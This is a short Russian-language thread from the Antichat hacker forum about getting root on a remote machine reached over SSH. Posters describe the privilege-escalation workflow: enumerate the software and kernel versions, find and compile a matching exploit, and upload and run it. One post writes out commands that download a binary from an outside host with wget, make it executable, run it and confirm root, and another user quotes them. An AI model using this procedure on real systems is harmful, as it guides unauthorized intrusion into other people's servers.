ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Инструменты (https://forum.antichat.xyz/forumdisplay.php?f=176)
-   -   Как рутануть ssh (https://forum.antichat.xyz/showthread.php?t=1623073)

Dr.Lafa 20.04.2018 01:49

Реально, если на удалённой машине есть уязвимости/лазейки для повышения привелегий

pr0phet 20.04.2018 03:38

Цитата:


3amunyk сказал(а):

По ядру искать уязвимости в метасплоите ?


Не в метасплойте. Узнай какой софт установлен - его версии - в том числе и ядро. Посмотри, есть ли gcc на серваке. Если есть - ищи подходящий сплойт - собирай - получай рута. Если нет gcc - поднимай на виртуалке подобную систему с подобным ядром - собирай у себя - заливай бинарник - получай рута. Ну это как пример. Если сплойт на перле - есесно тебе нужен интерпретатор на сервере. В общем логика такая.

pr0phet 20.04.2018 04:22

Цитата:


3amunyk сказал(а):

Вот тут не понял ) как бинарник соберу ?


gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root

z3RoTooL 20.04.2018 17:08

Цитата:


p.r0phe.t сказал(а):

gcc super_sploit.c -o super_sploit
wget http://xackep.site/super_sploit
chmod +x super_sploit
./super_sploit
whoami
root


как в кино прям )


Время: 20:08